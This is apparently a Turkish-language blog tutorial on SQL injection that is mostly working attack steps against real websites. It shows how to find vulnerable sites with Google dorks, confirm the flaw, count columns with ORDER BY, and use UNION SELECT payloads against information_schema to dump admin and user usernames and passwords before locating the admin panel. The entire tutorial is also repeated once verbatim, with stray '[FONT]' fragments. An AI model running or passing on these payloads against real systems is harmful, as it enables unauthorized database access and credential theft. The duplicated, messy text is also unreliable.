Basit Anlatımda SQL İnjection
İlk Olarak Elimizde Bir SQL Injection Açıklı Bir Site Olması Gerekmektedir. SQL Injection Açıklı Site Bulmak İçin Google’a
Dork Yazarak Elde Edebiliriz.
Örneğin Dorkumuz: page.php?id=
Hedef Sitemiz: http://www.deneme.com/page.php?id=1
Hedef Sitemizin Sonuna ;
http://www.deneme.com/page.php?id=1’a[FONT] Ekliyoruz.
Ekran’a Böyle Bir Hata Geliyor İse SQL Açıklı Bir Sitedir. Hatalar Çeşit Çeşittir.
-------------------------
Hatayı Aldıktan Sırada Kolon Sayımızı Öğrenmemiz Gerekli Öğrenmek İçin Aşağıdaki Kodları Yazmamız Gerekiyor.
http://www.deneme.com/page.php?id=1+order+by+5
Örneğin Kolon Sayımız ’5’ Olsun..
Sitenin Datebase Versiyonunu Öğrenelim..
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,version(),5
4.Kolonumuza Version() Yazıp Enter’a Bastığımızda Ekran’a Database Versiyonunu Verir.
-------------------------
Şimdi Tabloları Yazdıralım.
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5+from
+information_schema.tables+where+table_schema=database
Bunu Yazdık ve Ekran’a Tablolar Sırasıyla Geldi. Şimdi İçinde;
Admin
User Yada Bunlara Benzer Tablo İsimleri Varsa Bunların HEX Kodlarına Bakalım.
HEX Kodunu Öğrenmek
Tablonun Hex Kodunu Aldıktan Sonra ->
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5+from
+information_schema.tables+where+table_schema=database()+and+table_name=0x12345678
Şeklinde Yazıp Enter’a Basmadan, Diğer Düzenlemeleri Yapıyoruz.
-------------------------
Düzenlenmiş Hali:
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5+from
+information_schema.columns+where+table_schema=database()+and+table_name=0x12345678
Yazıp Enter Yaptığımızda Ekrana Seçilen Admin yada User Tablosunun Sütunları Yansıdı. Bu Sütunlarında
İçinde Bulunan;
ID-USERNAME-PASSWORD-EMAIL vs vs. Sütunlar Var Bunları Yansıtmak İçin...
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(USERNAME,PASSWORD),5+from
+User
Yazıp Enterladığımızda Site Üyesinin Yada Admin’nin Kullanıcı Adı ve Şifresi Çıkmaktadır.
-------------------------
Son Adım Olarak: Admin Paneli Bulma veya Kullanıcı Girişi Bulmak Kalıyor.
Dork Yazarak Elde Edebiliriz.
Örneğin Dorkumuz: page.php?id=
Hedef Sitemiz: http://www.deneme.com/page.php?id=1
Hedef Sitemizin Sonuna ;
http://www.deneme.com/page.php?id=1’a[FONT] Ekliyoruz.
Ekran’a Böyle Bir Hata Geliyor İse SQL Açıklı Bir Sitedir. Hatalar Çeşit Çeşittir.
-------------------------
Hatayı Aldıktan Sırada Kolon Sayımızı Öğrenmemiz Gerekli Öğrenmek İçin Aşağıdaki Kodları Yazmamız Gerekiyor.
http://www.deneme.com/page.php?id=1+order+by+5
Örneğin Kolon Sayımız ’5’ Olsun..
Sitenin Datebase Versiyonunu Öğrenelim..
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,version(),5
4.Kolonumuza Version() Yazıp Enter’a Bastığımızda Ekran’a Database Versiyonunu Verir.
-------------------------
Şimdi Tabloları Yazdıralım.
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5+from
+information_schema.tables+where+table_schema=database
Bunu Yazdık ve Ekran’a Tablolar Sırasıyla Geldi. Şimdi İçinde;
Admin
User Yada Bunlara Benzer Tablo İsimleri Varsa Bunların HEX Kodlarına Bakalım.
HEX Kodunu Öğrenmek
Tablonun Hex Kodunu Aldıktan Sonra ->
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5+from
+information_schema.tables+where+table_schema=database()+and+table_name=0x12345678
Şeklinde Yazıp Enter’a Basmadan, Diğer Düzenlemeleri Yapıyoruz.
-------------------------
Düzenlenmiş Hali:
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5+from
+information_schema.columns+where+table_schema=database()+and+table_name=0x12345678
Yazıp Enter Yaptığımızda Ekrana Seçilen Admin yada User Tablosunun Sütunları Yansıdı. Bu Sütunlarında
İçinde Bulunan;
ID-USERNAME-PASSWORD-EMAIL vs vs. Sütunlar Var Bunları Yansıtmak İçin...
http://www.deneme.com/page.php?id=-1+union+select+1,2,3,group_concat(USERNAME,PASSWORD),5+from
+User
Yazıp Enterladığımızda Site Üyesinin Yada Admin’nin Kullanıcı Adı ve Şifresi Çıkmaktadır.
-------------------------
Son Adım Olarak: Admin Paneli Bulma veya Kullanıcı Girişi Bulmak Kalıyor.
Yorumlar
Yorum Gönder